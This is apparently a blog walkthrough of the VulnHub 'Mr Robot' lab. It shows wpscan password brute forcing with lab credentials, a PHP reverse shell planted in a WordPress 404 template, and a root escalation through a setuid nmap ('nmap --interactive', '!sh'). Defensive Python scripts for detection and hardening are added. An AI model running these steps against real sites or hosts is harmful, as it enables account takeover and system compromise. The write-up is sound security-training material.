VulnHub — Mr Robot

Raj Singh
4 min read · Oct 4, 2019


Nmap

PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Issuer: commonName=www.example.com
| Public Key type: rsa
| Public Key bits: 1024
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2015-09-16T10:45:03
| Not valid after: 2025-09-13T10:45:03
| MD5: 3c16 3b19 87c3 42ad 6634 c1c9 d0aa fb97
|_SHA-1: ef0c 5fa5 931a 09a5 687c a2c2 80c4 c792 07ce f71b
MAC Address: 08:00:27:6B:62:C7 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 4.11
Uptime guess: 198.840 days (since Tue Mar 19 17:05:45 2019)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: All zeros

So both HTTP (80) and HTTPS (443) are open, while SSH is closed. Let's start enumerating the web server with dirsearch and nikto.

Dirsearch

└──╼ #dirsearch -u http://10.0.0.48 -e/ -x 403,500 -r

  _|. _ _  _  _  _ _|_    v0.3.8
 (_||| _) (/_(_|| (_| )

Extensions: / | Threads: 10 | Wordlist size: 6084

Error Log: /root/predator/others/hackthebox/scripts/dirsearch/logs/errors-19-10-04_15-39-45.log

Target: http://10.0.0.48

[15:39:45] Starting:
[15:39:46] 200 -   1KB - /
[15:40:38] 301 - 231B - /admin  ->  http://10.0.0.48/admin/
[15:40:40] 200 -   1KB - /admin/
[15:40:43] 200 -   1KB - /admin/?/login
[15:40:48] 200 -   1KB - /admin/index
[15:40:49] 200 -   1KB - /admin/index.html
[15:41:45] 301 - 231B - /audio  ->  http://10.0.0.48/audio/
[15:41:58] 301 - 230B - /blog  ->  http://10.0.0.48/blog/
[15:42:24] 301 - 229B - /css  ->  http://10.0.0.48/css/
[15:42:47] 200 -   0B - /favicon.ico
[15:43:05] 301 - 232B - /images  ->  http://10.0.0.48/images/
[15:43:11] 200 -   1KB - /index.html
[15:43:15] 200 - 504KB - /intro
[15:43:18] 301 - 228B - /js  ->  http://10.0.0.48/js/
[15:43:23] 200 - 309B - /license.txt
[15:44:34] 200 -  64B - /readme
[15:44:35] 200 -  64B - /readme.html
[15:44:39] 200 -  41B - /robots.txt
[15:44:54] 200 -   0B - /sitemap.xml.gz
[15:44:54] 200 -   0B - /sitemap.xml
[15:44:54] 200 -   0B - /sitemap
[15:45:38] 301 - 234B - /wp-admin  ->  http://10.0.0.48/wp-admin/
[15:45:40] 301 - 236B - /wp-content  ->  http://10.0.0.48/wp-content/
[15:45:41] 301 - 237B - /wp-includes  ->  http://10.0.0.48/wp-includes/
[15:45:42] 200 -   0B - /wp-content/plugins/google-sitemap-generator/sitemap-core.php
[15:45:42] 200 -   0B - /wp-content/
[15:45:49] Starting: /
[15:45:54] 200 -   1KB - /
[15:46:37] 301 - 231B - /admin  ->  http://10.0.0.48/admin/
[15:46:39] 200 -   1KB - /admin/
[15:46:42] 200 -   1KB - /admin/?/login
[15:46:45] 200 -   1KB - /admin/index
[15:46:46] 200 -   1KB - /admin/index.html
[15:47:30] 301 - 231B - /audio  ->  http://10.0.0.48/audio/
[15:47:40] 301 - 230B - /blog  ->  http://10.0.0.48/blog/
[15:48:08] 301 - 229B - /css  ->  http://10.0.0.48/css/
[15:48:31] 200 -   0B - /favicon.ico

In robots.txt we found “key 1 of 3” and a wordlist, fsocity.dic, and the /wp-admin directory shows the site runs WordPress. We had no credentials, so we used fsocity.dic as our wordlist.

But first let's sort the wordlist and drop its duplicate entries:

cat fsocity.dic | sort -u > new

With the deduplicated wordlist we can brute-force the WordPress login with wpscan:

wpscan -U new -P new --url http://192.168.29.213/

Username: elliot, Password: ER28-0652
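From the defender's side, a login brute force like this is loud in the web server's access log: a burst of POSTs to wp-login.php from one client, then a 302 redirect when a guess lands (a failed login is answered with 200 because WordPress re-renders the form). The script below is an added example, not code from the original post or from wpscan; it assumes Apache combined-format logs, a 60-second window and a threshold of 10 attempts (tune both), and runs over constructed sample lines:

```python
"""Detect WordPress login brute forcing in Apache access logs.

Added example, not code from the original post or from wpscan.  The log
lines are constructed; the 60-second window and 10-attempt threshold are
assumptions to tune per site.  WordPress answers a failed wp-login.php POST
with 200 (the form is re-rendered) and a successful one with a 302 redirect,
which is what makes a burst of 200s followed by a 302 stand out.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" format; only client IP, timestamp, method, path and
# status are needed here.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return {
        "ip": m["ip"],
        "ts": datetime.strptime(m["ts"], TS_FORMAT),
        "method": m["method"],
        "path": m["path"].split("?", 1)[0],   # ignore query string
        "status": int(m["status"]),
    }


def detect_login_bruteforce(log_text, window=timedelta(seconds=60), threshold=10):
    """Map each offending IP to its peak wp-login.php POST count in any window
    and whether any of its POSTs was answered with a 302 (login succeeded)."""
    attempts = defaultdict(list)
    succeeded = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["method"] != "POST" or rec["path"] != "/wp-login.php":
            continue
        attempts[rec["ip"]].append(rec["ts"])
        if rec["status"] == 302:
            succeeded.add(rec["ip"])

    alerts = {}
    for ip, times in attempts.items():
        times.sort()
        peak, start = 0, 0
        for end in range(len(times)):          # sliding window over sorted times
            while times[end] - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[ip] = {"peak_attempts_per_window": peak,
                          "login_succeeded": ip in succeeded}
    return alerts


def _line(ip, ts, method, path, status, ua):
    return f'{ip} - - [{ts}] "{method} {path} HTTP/1.1" {status} 512 "-" "{ua}"'


# Constructed sample: 10.0.0.5 fires twelve failed POSTs in twelve seconds and
# then succeeds; 10.0.0.7 is a real user who mistyped once; 10.0.0.9 just browses.
SAMPLE_LOG = "\n".join(
    [_line("10.0.0.5", f"04/Oct/2019:15:50:{s:02d} +0000", "POST", "/wp-login.php", 200, "WPScan")
     for s in range(1, 13)]
    + [
        _line("10.0.0.9", "04/Oct/2019:15:50:03 +0000", "GET", "/blog/", 200, "Mozilla/5.0"),
        _line("10.0.0.7", "04/Oct/2019:15:50:05 +0000", "POST", "/wp-login.php", 200, "Mozilla/5.0"),
        _line("10.0.0.7", "04/Oct/2019:15:50:20 +0000", "POST", "/wp-login.php", 302, "Mozilla/5.0"),
        _line("10.0.0.5", "04/Oct/2019:15:50:40 +0000", "POST", "/wp-login.php", 302, "WPScan"),
    ]
)

if __name__ == "__main__":
    for ip, info in detect_login_bruteforce(SAMPLE_LOG).items():
        print(ip, info)
```

The sliding window is what keeps a slow, legitimate user with a couple of typos out of the alert list while still catching a wordlist run; the "login_succeeded" flag is the one that turns a noise alert into an incident.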

Once logged in, we found the theme editor under Appearance, which lets us edit any theme file, so we edited the 404 template and replaced its original content with our PHP reverse shell script.

Normally, requesting a path that does not exist on the WordPress site just renders the 404 template. After the change, requesting a non-existent path executes our replaced template instead and sends a reverse shell back to our “nc” listener.

We got the reverse shell by requesting http://10.0.0.48/wp-admin/boom
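The theme editor is the weak point this step relies on: it is on by default and exposes every theme file to anyone who can log in as an administrator. The script below is an added example, not code from the original post or from WordPress. It checks whether wp-config.php sets the real DISALLOW_FILE_EDIT constant (which turns the theme and plugin editors off), scans the theme directory for PHP primitives a dropped template would need, and inserts the constant where it is missing. The install it audits is a constructed fixture, and the RISKY_CALLS list is an assumption to extend:

```python
"""Audit a WordPress install for the theme-editor weakness used above.

Added example, not code from the original post or from WordPress.  It checks
that wp-config.php sets DISALLOW_FILE_EDIT (a real WordPress constant that
disables Appearance > Theme Editor and the plugin editor) and scans theme
templates for PHP primitives a dropped shell would need.  The install it
scans is a constructed fixture; RISKY_CALLS is an assumption to extend.
"""
import re
import tempfile
from pathlib import Path

# PHP functions a theme template has no ordinary reason to call.
RISKY_CALLS = ("shell_exec", "exec", "system", "passthru", "proc_open",
               "popen", "fsockopen", "eval", "base64_decode")
RISKY_RE = re.compile(r"\b(" + "|".join(RISKY_CALLS) + r")\s*\(")
FILE_EDIT_RE = re.compile(
    r"define\s*\(\s*['\"]DISALLOW_FILE_EDIT['\"]\s*,\s*true\s*\)", re.IGNORECASE)
HARDENING_LINE = "define('DISALLOW_FILE_EDIT', true);\n"


def file_edit_disabled(wp_root):
    """True when wp-config.php defines DISALLOW_FILE_EDIT as true."""
    cfg = Path(wp_root) / "wp-config.php"
    return cfg.is_file() and bool(FILE_EDIT_RE.search(cfg.read_text(errors="replace")))


def scan_themes(wp_root):
    """Return {theme file: sorted risky function names} for files with hits."""
    findings = {}
    root = Path(wp_root)
    for php in sorted((root / "wp-content" / "themes").rglob("*.php")):
        hits = sorted(set(RISKY_RE.findall(php.read_text(errors="replace"))))
        if hits:
            findings[php.relative_to(root).as_posix()] = hits
    return findings


def audit(wp_root):
    return {"file_edit_disabled": file_edit_disabled(wp_root),
            "suspicious_templates": scan_themes(wp_root)}


def apply_hardening(wp_root):
    """Insert DISALLOW_FILE_EDIT into wp-config.php.  The constant must be
    defined before wp-settings.php is required, so it goes above that line.
    Returns False if the constant was already set."""
    if file_edit_disabled(wp_root):
        return False
    cfg = Path(wp_root) / "wp-config.php"
    lines = cfg.read_text().splitlines(keepends=True)
    idx = next((i for i, l in enumerate(lines) if "wp-settings.php" in l), len(lines))
    lines.insert(idx, HARDENING_LINE)
    cfg.write_text("".join(lines))
    return True


def build_sample_install():
    """Constructed fixture: no DISALLOW_FILE_EDIT, and a 404.php that has been
    rewritten to open a socket and run a command (placeholder arguments only)."""
    base = Path(tempfile.mkdtemp())
    theme = base / "wp-content" / "themes" / "twentyfifteen"
    theme.mkdir(parents=True)
    (base / "wp-config.php").write_text(
        "<?php\ndefine('DB_NAME', 'wordpress');\n"
        "require_once ABSPATH . 'wp-settings.php';\n")
    (theme / "index.php").write_text("<?php get_header(); get_footer();\n")
    (theme / "404.php").write_text(
        "<?php\n$sock = fsockopen($host, $port);\nexec($cmd);\n")
    return str(base)


if __name__ == "__main__":
    root = build_sample_install()
    print(audit(root))
    apply_hardening(root)
    print(audit(root))
```

Disabling the editor does not stop an administrator account from installing a malicious plugin or theme upload, so the function scan is the part worth running on a schedule; DISALLOW_FILE_EDIT just removes the one-click path this walkthrough takes.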

We landed as the daemon user and found an MD5 hash in the robot directory.

Cracking the hash gave “abcdefghijklmnopqrstuvwxyz”, the password for the robot user.

Running LinEnum.sh showed that nmap has the SUID bit set, so we used the commands below to escalate privileges:

nmap --interactive
nmap> !sh

And we got root (euid).
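The fix for that last step is to take the setuid bit off anything that does not need it. The script below is an added example, not LinEnum's code, and it does the audit the other way round from LinEnum: it walks a tree, reports every setuid file whose name is not on an allowlist of binaries that distributions normally ship setuid, and clears the bit. The allowlist is an assumption to adjust per distribution and the tree it walks is a constructed fixture. nmap's --interactive mode is only present in older Nmap releases, but a setuid nmap should be flagged regardless, since nothing about it needs setuid:

```python
"""Audit setuid binaries, the weakness LinEnum.sh surfaced above.

Added example, not LinEnum's own code.  The approach is an allowlist: any
setuid regular file whose name is not one of the binaries a distribution
normally ships setuid is reported, and remediate() clears the bit (chmod u-s).
EXPECTED_SUID is an assumption to adjust per distribution, and the directory
tree scanned here is a constructed fixture standing in for a host.
"""
import os
import stat
import tempfile
from pathlib import Path

# Binaries commonly shipped setuid-root on Linux distributions (assumed list).
EXPECTED_SUID = {"passwd", "su", "sudo", "mount", "umount", "ping", "chsh",
                 "chfn", "gpasswd", "newgrp", "fusermount", "pkexec"}


def find_suid(root):
    """Return sorted paths of regular files under root with the setuid bit set."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)          # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def unexpected_suid(root):
    """Setuid files whose basename is not on the allowlist."""
    return [p for p in find_suid(root) if os.path.basename(p) not in EXPECTED_SUID]


def remediate(path):
    """Clear the setuid bit (equivalent to chmod u-s).  True if it is now clear."""
    mode = os.stat(path).st_mode & 0o7777
    os.chmod(path, mode & ~stat.S_ISUID)
    return not (os.stat(path).st_mode & stat.S_ISUID)


def build_sample_tree():
    """Constructed fixture: setuid nmap (should not be), setuid passwd
    (expected) and a plain ls, all as placeholder shell scripts."""
    base = Path(tempfile.mkdtemp())
    bin_dir = base / "usr" / "bin"
    bin_dir.mkdir(parents=True)
    for name, mode in (("nmap", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
        f = bin_dir / name
        f.write_text("#!/bin/sh\n")
        f.chmod(mode)
    return str(base)


if __name__ == "__main__":
    root = build_sample_tree()
    for p in unexpected_suid(root):
        print("unexpected setuid:", p)
        remediate(p)
```

On a real host, run find_suid over "/" (as root, so that every directory is readable) and diff the result against a known-good baseline taken at build time; a new entry between two runs is worth an alert on its own, whether or not it is on the allowlist.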

Written by Raj Singh

Security Researcher, Product Security Engineer
